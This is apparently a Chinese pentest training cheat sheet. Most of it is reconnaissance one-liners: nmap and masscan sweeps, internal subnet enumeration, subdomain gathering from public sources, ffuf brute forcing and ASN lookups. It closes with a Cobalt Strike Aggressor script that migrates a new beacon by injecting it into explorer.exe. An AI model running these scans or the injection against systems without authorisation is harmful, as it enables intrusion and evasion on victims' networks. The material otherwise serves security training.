等保培训
信息收集小脚本
#nmap扫描存活
nmap -sn 172.29.130.0/24 > nmap-ip.txt
#获取nmap扫描存活的ip
cat nmap-ip.txt | grep "repo" | cut -d " " -f6 | cut -d "(" -f2 | cut -d ")" -f1 > ip.txt
#masscan扫描端口
sudo masscan -iL ip.txt --rate 10000 -p1-65535 --only-open
#获取masscan扫描结果中的ip
cat masscan-ip.txt | grep "tcp" | cut -d " " -f 4,6 | awk '{print $2,$1}'| tr " " ":" | cut -d "/" -f1 | cut -d ":" -f1 | sort -t "." -k4n | uniq > ip.txt
#获取masscan扫描结果中的端口
cat masscan-ip.txt | grep "tcp" | cut -d " " -f 4,6 | awk '{print $2,$1}'| tr " " ":" | cut -d "/" -f1 | cut -d ":" -f2 | sort -n | uniq > port.txt
# bash下,向文件的每行添加特定的内容,此处是ip,例如:192.168.1.x,转换后为192.168.1.0/24
cat ip.txt | cut -d " " -f1 | cut -d ":" -f1 | cut -d "." -f1,2,3 | sed 's/$/.0\/24/'
# bash下,向文件的每行添加特定的内容,此处是ip,例如:192.168.1.5,转换后为http://192.168.1.5
cat ip.txt | cut -d " " -f1 | cut -d ":" -f1 | cut -d "." -f1,2,3 | sed 's/^/http:\/\//'
# windows下批量ping C段,识别存活
for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.1.%i
# 获取内网段所有网关ip,判断C段是否存活
#A段
for i in {1..255};do for b in {1..255};do echo "10".$i.$b."1";done;done
#B段
for i in {16..31};do for b in {1..255};do echo "172".$i.$b."1";done;done
#C段
for i in {1.255};do echo "192.168".$i."1";done
@steve_mcilwain
for DOMAIN in $(cat domains.txt);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done
#Get Subdomains from RapidDNS.io
@andirrahmani1
curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
#Get Subdomains from VirusTotal
@pikpikcu
curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
# Get Subdomains from crt.sh
@vict0ni
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
# Subdomain Bruteforcer with FFUF
@GochaOqradze
ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | grep "| URL |" | awk '{print $4}'
# Find All Allocated IP ranges for ASN given an IP address
wains.be
whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
#Extract IPs from a File
@emenalf
grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
#Create Custom Wordlists
@tomnomnom
gau domain.com| unfurl -u keys | tee -a wordlist.txt ; gau domain.com | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
#Find Hidden Servers and/or Admin Panels
@rez0__
ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt
#Extract endpoints from APK files
@laughface809
apkurlgrep -a path/to/file.apk
# Get Subdomains from IPs
@laughface809
python3 hosthunter.py <target-ips.txt> > vhosts.txt
# 修改回连间隔为1S,然后立即迁移进程到explorer
on beacon_initial{
sub callback
{
$regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
$listener = "domain";
if ($2ismatch $regex){
$pid = matched()[1];
$inject_pid = $pid;
if (-is64 $1) {
$arch = "x64";
} else {
$arch = "x86";
}
binject($1, $pid, $listener, $arch);
}
}
if($inject_pid != beacon_info($1,"pid")) {
bps($1, &callback);
}
}